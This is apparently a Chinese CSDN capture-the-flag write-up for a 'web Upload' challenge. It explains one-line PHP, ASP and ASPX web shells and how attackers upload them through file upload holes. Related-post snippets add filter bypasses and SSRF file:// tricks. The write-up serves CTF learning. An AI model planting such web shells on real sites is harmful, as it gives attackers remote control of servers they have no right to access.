“百度杯”CTF比赛 九月场--web Upload

最新推荐文章于 2021-11-01 22:48:36 发布
最新推荐文章于 2021-11-01 22:48:36 发布
阅读量622 收藏 7
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanjinrui15/article/details/111957147
版权
本文介绍了在“百度杯”CTF比赛中关于Web上传的题目,详细讲解了一句话木马的概念、工作原理以及如何利用它们。内容涵盖了HTML渲染过程、Linux的cat命令使用,以及三种不同的解题思路,包括PHP的htmlspecialchars和file函数的使用,以及绕过限制的方法。
摘要由CSDN通过智能技术生成

“百度杯”CTF比赛 九月场--web Upload

基础知识

1、什么是一句话木马?

最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马:

<?php @eval($_POST['key']) ?>

【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘key’]表示从页面中获得key这个参数值。

其中,只要攻击者满足三个条件,就能实现成功入侵:

  1. 木马上传成功,未被杀;
  2. 知道木马的路径在哪;
  3. 上传的木马能正常运行。

常见的一句话木马有:

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

2、一句话木马的简要原理

首先我们先看一个原始而又简单的php一句话木马:

 <?php @eval
最低0.47元/天 解锁文章
bingge15
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
百度CTF比赛 九月 —— upload
吃肉唐僧的博客
09-07 295
打开题目,发现可以上传任意文件 构造一句话木马文件上传 居然上传成功,点开链接 发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容 换一种方式 <script language="pHp">@eval($_POST['sb'])</script> 上传,菜刀无链接 拿到flag ...
百度CTF比赛 九月 Web-Upload
qq_34106499的博客
01-14 499
1. php一句话木马编写及使用(长标签); 2. 上传文件绕过 ` <? ' , ' php ' 的方法; 3. 菜刀连接php一句话木马;
百度CTF比赛 九月 Upload
weixin_43858799的博客
05-19 553
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件来获取到flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
ctf-攻防世界-webupload1
一只菜鸟的博客
11-01 498
一个很简单绕过的文件上传 打开靶,发现一个很简单的上传点。在靶地址后面加index.php,正常访问无跳转,加index.asp,报错且显示apache容器,看来绝对是php的网站了 burp开启代理,尝试上传php一句话,发现burp没发送请求包就提示文件类型不对,看来是前端验证文件类型。 右键查看源代码,果然是前端验证,只能上传jpg和png。 把写好的一句话后缀改为jpg或png,开启burp,在上传时抓包,将文件后缀改为php,成功绕过上传,并显示...
百度CTF比赛 九月 Web-Do you know upload
qq_34106499的博客
01-17 387
1. 上传类型的限制方法; 2. 抓包修改上传文件类型; 3. 菜刀连接一句话木马; 4. 菜刀连接数据库,并查询数据库内容;
CTFHUB-WEB-SSRF【10】内网访问 伪协议读取文件 端口扫描
(∪.∪ )...zzz的博客
06-13 752
看我内网访问直接访问127.0.0.1/flag.php伪协议读取文件file:///var/www/html/flag.php端口扫描?url=dict://127.0.0.1:端口号burp 爆破 内网访问 直接访问127.0.0.1/flag.php ?url=127.0.0.1/flag.php ctfhub{a10924e3925b415219119faa} 伪协议读取文件 file:///var/www/html/flag.php 端口扫描 ?url=dict://127.0.0.1:
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
CTF比赛编码工具Captfencoder-1.3.0
09-21
Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) ...
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
bugkuctf_web flag.php
wuerror的博客
08-13 1451
根据提示,访问:http://120.24.86.145:8002/flagphp/?hint=1 得到源码 观察可知要构造cookie:IScer=XXX,这个XXX是$key序列化之后的值。 一个坑在这个key的值,不是下面给的结果(www.isecer.com),而是NULL。因为key的值在上面还未定义(此处要感谢大佬的wp) ...
百度CTF比赛 九月——Web-Upload
Ifish的博客
05-28 2618
题目描述 解题思路 看到提示,随意上传文件,并且flag在flag.php中,创建赛题,打开链接 就简单上传一个一句话上去 &amp;amp;lt;?php @eval($_POST[&amp;quot;code&amp;quot;]); ?&amp;amp;gt; 结果显示上传成功,但是,发现把“&amp;amp;lt;”和”php ”给过滤掉了 那我们就很自然的想到PHP的长标签了 重新修改代码 &amp;am
i春秋 web百度CTF比赛 九月-Upload & code
ChanCherry的博客
10-13 983
百度CTF比赛 九月Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
百度CTF Write up集锦 WEB
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
百度CTF比赛 九月 SQL-writeup
大方子
07-31 2928
  这题自己的收获:用&lt;&gt;隔开敏感字符,绕过防注入   题目界面: 刚开始还是老规矩输入and 1=1  发现被拦截  此外 测试了or 发现也进行了拦截 我们可以用下面的字符来替换 and 和 or and----&gt;&amp;&amp;    ,     or-----&gt; ||       替换后发现可以成功绕过 接下来进行猜字段长度  发...
[CTFSHOW1024]Web
Y4tacker的博客
10-31 4276
文章目录1024_WEB签到1024_图片代理1024_fastapi姿势一姿势二参考文章 1024_WEB签到 代码审计,唯一利用点call_user_func,一般都是需要两个参数(可以看看官方文档你就知道我的意思了),但是本题只给了我们传入一个参数的选择,那么他必定是无参数的函数,加上这个是一道签到题,所以不难得出看看phpinfo里面到底有啥 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-20 23:5
CTF web总结
zb0567的专栏
05-18 9962
从今天开始,关注CTF夺旗赛1、http://shiyanbar.com/ctf/56 what a fuck!这是什么鬼东西? 解题链接: http://ctf5.shiyanbar.com/DUTCTF/1.html ...
百度CTF比赛 九月 Web Upload
feng的博客
09-06 250
WP 一道文件上传题,但是让我学到了新姿势。 首先打开环境,上面说可以随意上传文件。 我们直接注入一个一句话木马在shell.php,再上传上去,一句话木马是: <?php @eval($_POST['feng']);?> 上传成功后发现下方有一个链接,我们打开看看。 发现前面的<?php没有了。再经过反复的尝试,最终会发现它过滤了<?和php。这时候我就一筹莫展了,我去查<?和php被过滤了该怎么办,但是没查到,最终只能看了WP,知道这种新姿势: <script
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值